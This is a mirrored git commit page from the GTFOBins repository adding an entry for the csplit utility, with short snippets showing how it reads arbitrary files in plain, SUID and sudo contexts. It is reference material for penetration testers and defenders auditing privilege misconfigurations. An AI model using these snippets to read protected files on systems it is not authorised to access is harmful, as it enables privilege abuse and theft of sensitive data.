mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-25 19:54:14 +02:00
New command: csplit
This commit is contained in:
18
_gtfobins/csplit.md
Normal file
18
_gtfobins/csplit.md
Normal file
@@ -0,0 +1,18 @@
|
||||
---
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
csplit $LFILE 1
|
||||
cat xx01
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
csplit $LFILE 1
|
||||
cat xx01
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
csplit $LFILE 1
|
||||
cat xx01
|
||||
---
|
Reference in New Issue
Block a user